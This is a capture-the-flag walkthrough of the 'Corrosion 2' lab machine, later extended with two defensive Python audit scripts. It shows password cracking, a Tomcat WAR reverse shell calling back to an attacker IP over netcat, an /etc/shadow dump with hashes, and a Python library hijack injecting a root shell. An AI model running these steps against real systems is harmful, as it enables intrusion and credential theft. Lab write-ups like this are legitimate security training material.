Corrosion 2
Port recognition with nmap
┌──(root@ghost)-[/home/ghost]
└─# nmap --min-rate 5000 -sV corrosion.vuln
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-04 19:39 EST
Nmap scan report for corrosion.vuln (10.0.2.92)
Host is up (0.000062s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
8080/tcp open http Apache Tomcat 9.0.53
MAC Address: 08:00:27:81:64:BF (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.45 seconds
Nmap reports three open ports: 22 (SSH), 80 (Apache httpd) and 8080 (Apache Tomcat)
┌──(root@ghost)-[/home/ghost]
└─# wfuzz -c -t 100 --hc=404 -z file,/usr/share/dirb/wordlists/common.txt http://corrosion.vuln:8080/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://corrosion.vuln:8080/FUZZ
Total requests: 4614
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 198 L 490 W 11136 Ch "http://corrosion.vuln:8080/"
000001319: 302 0 L 0 W 0 Ch "docs"
000001519: 302 0 L 0 W 0 Ch "examples"
000001575: 200 21 L 132 W 21588 Ch "favicon.ico"
000001920: 302 0 L 0 W 0 Ch "host-manager"
000002436: 302 0 L 0 W 0 Ch "manager"
Total time: 3.791455
Processed Requests: 4614
Filtered Requests: 4608
Requests/sec.: 1216.946
┌──(root@ghost)-[/home/ghost]
└─# wfuzz -c -t 100 --hc=404 -z file,/usr/share/dirb/wordlists/common.txt -z list,php-html-txt-bak-zip http://corrosion.vuln:8080/FUZZ.FUZ2Z
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://corrosion.vuln:8080/FUZZ.FUZ2Z
Total requests: 23070
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000002815: 200 120 L 1306 W 32107 Ch "backup - zip"
000016463: 200 2 L 29 W 153 Ch "readme - txt"
Total time: 18.43840
Processed Requests: 23070
Filtered Requests: 23068
Requests/sec.: 1251.192
Fuzzing the Apache Tomcat server for directories and files
┌──(root@ghost)-[/home/ghost]
└─# curl -s http://corrosion.vuln:8080/backup.zip -o backup.zip
Downloading backup.zip file
┌──(root@ghost)-[/home/ghost]
└─# unzip backup.zip
Archive: backup.zip
[backup.zip] catalina.policy password:
The archive is password protected
┌──(root@ghost)-[/home/ghost]
└─# zip2john backup.zip 2>/dev/null > hash
Converting the zip to John the Ripper's hash format
┌──(root@ghost)-[/home/ghost]
└─# john --wordlist=rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
@administrator_hi5 (backup.zip)
1g 0:00:00:01 DONE (2023-03-04 20:04) 0.6756g/s 7761Kp/s 7761Kc/s 7761KC/s @alex123..@aal?~112
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
We cracked the zip file's password
┌──(root@ghost)-[/home/ghost]
└─# unzip backup.zip
Archive: backup.zip
[backup.zip] catalina.policy password:
inflating: catalina.policy
inflating: context.xml
inflating: catalina.properties
inflating: jaspic-providers.xml
inflating: jaspic-providers.xsd
inflating: logging.properties
inflating: server.xml
inflating: tomcat-users.xml
inflating: tomcat-users.xsd
inflating: web.xml
Extracting the compressed files
┌──(root@ghost)-[/home/ghost]
└─# grep -r 'username' tomcat-users.xml
you must define such a user - the username and password are arbitrary.
<user username="admin" password="<must-be-changed>" roles="manager-gui"/>
<user username="robot" password="<must-be-changed>" roles="manager-script"/>
<user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
<user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
<user username="role1" password="<must-be-changed>" roles="role1"/>
<user username="manager" password="melehifokivai" roles="manager-gui"/>
<user username="admin" password="melehifokivai" roles="admin-gui, manager-gui"/>
Credentials found in tomcat-users.xml; log in to http://corrosion.vuln:8080/manager/ as admin:melehifokivai
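As an added defensive check (not part of the original writeup), the following Python audits a tomcat-users.xml for accounts holding Manager/Host Manager roles and for passwords shared between accounts; the sample document is constructed to mirror the recovered file, and the role list comes from Tomcat's Manager documentation.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

# Roles that control the Manager and Host Manager web apps (Tomcat docs).
# manager-script in particular allows non-interactive WAR deployment.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "manager-status", "admin-gui", "admin-script"}

# Constructed sample mirroring the shape of the recovered tomcat-users.xml;
# the stock placeholders sit inside an XML comment, as in Tomcat's default file.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <!--
  <user username="admin" password="<must-be-changed>" roles="manager-gui"/>
  <user username="robot" password="<must-be-changed>" roles="manager-script"/>
  -->
  <user username="manager" password="melehifokivai" roles="manager-gui"/>
  <user username="admin" password="melehifokivai" roles="admin-gui, manager-gui"/>
  <user username="both" password="unique-example-pw" roles="tomcat,role1"/>
</tomcat-users>
"""


def audit_tomcat_users(xml_text: str) -> list:
    """Return a list of findings for a tomcat-users.xml document."""
    root = ET.fromstring(xml_text)
    findings = []
    users_by_password = defaultdict(list)
    for elem in root.iter():
        if elem.tag.split('}')[-1] != 'user':     # strip the default namespace
            continue
        name = elem.get('username', '')
        roles = {r.strip() for r in elem.get('roles', '').split(',') if r.strip()}
        users_by_password[elem.get('password', '')].append(name)
        privileged = sorted(roles & PRIVILEGED_ROLES)
        if privileged:
            findings.append(f"{name}: privileged roles {privileged}")
    # The same password on two manager accounts doubles the blast radius of a leak
    for names in users_by_password.values():
        if len(names) > 1:
            findings.append(f"password shared by {sorted(names)}")
    return findings


if __name__ == '__main__':
    for finding in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(finding)
```

Run it against the real file on the server (normally conf/tomcat-users.xml) and against any backup archive that may leave the server's document root, as backup.zip did here.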
┌──(root@ghost)-[/home/ghost]
└─# bash shellstorm.sh war 10.0.2.15 1337
added manifest
adding: payload.jsp(in = 1496) (out= 582)(deflated 61%)
adding: WEB-INF/(in = 0) (out= 0)(stored 0%)
adding: WEB-INF/web.xml(in = 258) (out= 182)(deflated 29%)
[+] war file compiled in /tmp/war/payload.war
Generating the WAR file with ShellStorm
┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337
listening on [any] 1337 ...
connect to [10.0.2.15] from corrosion.vuln [10.0.2.92] 35650
tomcat@corrosion:/var/spool/cron$
After selecting our WAR file in the manager, click the Deploy button. Then, with the netcat listener running, visit http://corrosion.vuln:8080/payload/ to get the reverse shell
tomcat@corrosion:/home/randy$ cat user.txt
ca73a018ae6908a7d0ea5d1c269ba4b6
Here is the user flag
tomcat@corrosion:/home/randy$ ls /home
jaye randy
tomcat@corrosion:/home/randy$ su jaye
su jaye
Password: melehifokivai
$ script /dev/null -c bash
Script started, file is /dev/null
jaye@corrosion:/home/randy$
Reusing the Tomcat password to pivot to the jaye account
jaye@corrosion:/home/randy$ find / -perm -u=s 2>/dev/null
...
/home/jaye/Files/look
...
jaye@corrosion:/home/randy$ ls -la /home/jaye/Files/look
---s--s--x 1 root root 14728 Sep 17 2021 /home/jaye/Files/look
This SUID program can read files with root privileges
jaye@corrosion:/home/randy$ /home/jaye/Files/look '' /etc/shadow
root:$6$fHvHhNo5DWsYxgt0$.3upyGTbu9RjpoCkHfW.1F9mq5dxjwcqeZl0KnwEr0vXXzi7Tld2lAeYeIio/9BFPjUCyaBeLgVH1yK.5OR57.:18888:0:99999:7:::
daemon:*:18858:0:99999:7:::
bin:*:18858:0:99999:7:::
sys:*:18858:0:99999:7:::
sync:*:18858:0:99999:7:::
games:*:18858:0:99999:7:::
man:*:18858:0:99999:7:::
lp:*:18858:0:99999:7:::
mail:*:18858:0:99999:7:::
news:*:18858:0:99999:7:::
uucp:*:18858:0:99999:7:::
proxy:*:18858:0:99999:7:::
backup:*:18858:0:99999:7:::
list:*:18858:0:99999:7:::
irc:*:18858:0:99999:7:::
gnats:*:18858:0:99999:7:::
nobody:*:18858:0:99999:7:::
systemd-network:*:18858:0:99999:7:::
systemd-resolve:*:18858:0:99999:7:::
systemd-timesync:*:18858:0:99999:7:::
messagebus:*:18858:0:99999:7:::
syslog:*:18858:0:99999:7:::
_apt:*:18858:0:99999:7:::
tss:*:18858:0:99999:7:::
uuidd:*:18858:0:99999:7:::
tcpdump:*:18858:0:99999:7:::
avahi-autoipd:*:18858:0:99999:7:::
usbmux:*:18858:0:99999:7:::
rtkit:*:18858:0:99999:7:::
dnsmasq:*:18858:0:99999:7:::
cups-pk-helper:*:18858:0:99999:7:::
speech-dispatcher:!:18858:0:99999:7:::
avahi:*:18858:0:99999:7:::
kernoops:*:18858:0:99999:7:::
saned:*:18858:0:99999:7:::
nm-openvpn:*:18858:0:99999:7:::
hplip:*:18858:0:99999:7:::
whoopsie:*:18858:0:99999:7:::
colord:*:18858:0:99999:7:::
geoclue:*:18858:0:99999:7:::
pulse:*:18858:0:99999:7:::
gnome-initial-setup:*:18858:0:99999:7:::
gdm:*:18858:0:99999:7:::
sssd:*:18858:0:99999:7:::
randy:$6$bQ8rY/73PoUA4lFX$i/aKxdkuh5hF8D78k50BZ4eInDWklwQgmmpakv/gsuzTodngjB340R1wXQ8qWhY2cyMwi.61HJ36qXGvFHJGY/:18888:0:99999:7:::
systemd-coredump:!!:18886::::::
tomcat:$6$XD2Bs.tL01.5OT2b$.uXUR3ysfujHGaz1YKj1l9XUOMhHcKDPXYLTexsWbDWqIO9ML40CQZPI04ebbYzVNBFmgv3Mpd3.8znPfrBNC1:18888:0:99999:7:::
sshd:*:18887:0:99999:7:::
jaye:$6$Chqrqtd4U/B1J3gV$YjeAWKM.usyi/JxpfwYA6ybW/szqkiI1kerC4/JJNMpDUYKavQbnZeUh4WL/fB/4vrzX0LvKVWu60dq4SOQZB0:18887:0:99999:7:::
Reading /etc/shadow through the SUID binary
┌──(root@ghost)-[/home/ghost]
└─# john --wordlist=rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
07051986randy (randy)
1g 0:00:07:02 DONE (2023-03-04 21:05) 0.6060g/s 1666p/s 1666c/s 1666C/s 24brandy..!brandyn!
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Cracked randy's hash
┌──(root@ghost)-[/home/ghost]
└─# ssh randy@corrosion.vuln
randy@corrosion.vuln's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.11.0-34-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
19 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
randy@corrosion:~$
Connected as randy via ssh
randy@corrosion:~$ sudo -l
[sudo] password for randy:
Matching Defaults entries for randy on corrosion:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User randy may run the following commands on corrosion:
(root) PASSWD: /usr/bin/python3.8 /home/randy/randombase64.py
Randy can run /usr/bin/python3.8 /home/randy/randombase64.py as root
randy@corrosion:~$ ls -la randombase64.py
-rwxr-xr-x 1 root root 210 Sep 20 2021 randombase64.py
randy@corrosion:~$ cat randombase64.py
import base64
message = input("Enter your string: ")
message_bytes = message.encode('ascii')
base64_bytes = base64.b64encode(message_bytes)
base64_message = base64_bytes.decode('ascii')
print(base64_message)
We can't modify the randombase64.py file (owned by root, mode 755)
randy@corrosion:~$ find / base64 2>/dev/null | grep python | grep base64 | grep -v '/snap'
/usr/lib/python3.8/encodings/base64_codec.py
/usr/lib/python3.8/encodings/__pycache__/base64_codec.cpython-38.pyc
/usr/lib/python3.8/__pycache__/base64.cpython-38.pyc
/usr/lib/python3.8/email/base64mime.py
/usr/lib/python3.8/email/__pycache__/base64mime.cpython-38.pyc
/usr/lib/python3.8/base64.py
randy@corrosion:~$ ls -la /usr/lib/python3.8/base64.py
-rwxrwxrwx 1 root root 20386 Sep 20 2021 /usr/lib/python3.8/base64.py
But /usr/lib/python3.8/base64.py, which the script imports, is world-writable (rwxrwxrwx), and that is enough for us
randy@corrosion:~$ nano /usr/lib/python3.8/base64.py
#! /usr/bin/python3.8
import os
os.system('/bin/sh')
"""Base16, Base32, Base64 (RFC 3548), Base85 and Ascii85 data encodings"""
# Modified 04-Oct-1995 by Jack Jansen to use binascii module
# Modified 30-Dec-2003 by Barry Warsaw to add full RFC 3548 support
# Modified 22-May-2007 by Guido van Rossum to use bytes everywhere
import re
import struct
import binascii
__all__ = [
# Legacy interface exports traditional RFC 2045 Base64 encodings
'encode', 'decode', 'encodebytes', 'decodebytes',
# Generalized interface for other encodings
...
Simply importing the os module and calling '/bin/sh' at the top of the library works for this kind of Python library hijack
randy@corrosion:~$ sudo -u root /usr/bin/python3.8 /home/randy/randombase64.py
# cat /root/root.txt
2fdbf8d4f894292361d6c72c8e833a4b
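The root cause here is a standard-library file that any local user could overwrite. As an added defensive audit (not from the original writeup), the following Python walks the interpreter's import search path and reports every directory or .py file writable by group or world; the script name audit_pypath.py in the comment is an assumed placeholder.

```python
import os
import stat
import sys


def mode_is_writable_by_others(mode: int) -> bool:
    """True if the permission bits allow group or world write access.

    A library file with these bits can be replaced by any local user, which
    is exactly the condition that made /usr/lib/python3.8/base64.py (mode 777)
    hijackable; a writable directory lets a user drop a new module there."""
    return bool(stat.S_IMODE(mode) & (stat.S_IWGRP | stat.S_IWOTH))


def find_writable_modules(search_paths):
    """Walk the given import directories and return (path, octal mode) for
    every directory and .py file that a non-owner could write to.
    Entries that are not directories (zip files, missing paths) are skipped;
    '' stands for the current working directory, as in sys.path."""
    findings = []
    seen = set()
    for base in search_paths:
        base = os.path.realpath(base or os.getcwd())
        if base in seen or not os.path.isdir(base):
            continue
        seen.add(base)
        for root, _dirs, files in os.walk(base):
            candidates = [root] + [os.path.join(root, f)
                                   for f in files if f.endswith('.py')]
            for full in candidates:
                try:
                    mode = os.lstat(full).st_mode
                except OSError:
                    continue
                if stat.S_ISLNK(mode):        # judge the target, not the link
                    continue
                if mode_is_writable_by_others(mode):
                    findings.append((full, oct(stat.S_IMODE(mode))))
    return findings


if __name__ == '__main__':
    # Run with the same interpreter the sudo rule invokes, e.g.
    #   /usr/bin/python3.8 audit_pypath.py
    # so that sys.path matches what the privileged script will import.
    hits = find_writable_modules(sys.path)
    for path, mode in hits:
        print(f'{mode} {path}')
    print(f'{len(hits)} writable import path(s) found')
```

The same check applies to every interpreter that a sudo rule or cron job runs as root; the fix for a finding like base64.py is restoring the stock 644 permissions and verifying the file's contents against the distribution package.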